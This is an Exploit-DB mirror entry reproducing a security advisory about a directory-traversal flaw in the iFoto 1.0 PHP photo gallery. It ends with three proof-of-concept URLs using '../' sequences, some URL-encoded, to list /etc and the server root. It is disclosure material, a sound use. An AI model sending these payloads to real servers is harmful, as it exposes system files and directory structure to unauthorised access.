exploit-db-mirror/platforms/php/webapps/30389.txt
Offensive Security 30d9cc4c3d Updated 01_04_2014
2014-01-04 23:27:58 +00:00

11 lines
No EOL
568 B
Text
Executable file

source: http://www.securityfocus.com/bid/25065/info
iFoto is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
A remote attacker can exploit this issue to view the directory structure of the affected computer within the context of the webserver.
This issue affects iFoto 1.0; other versions may also be affected.
http://www.example.com/ifoto/?dir=..%2F..%2F..%2F..%2F..%2F..%2Fetc
http://www.example.com/ifoto/?dir=../../../../../../etc
http://www.example.com/ifoto/index.php?dir=../../../../../../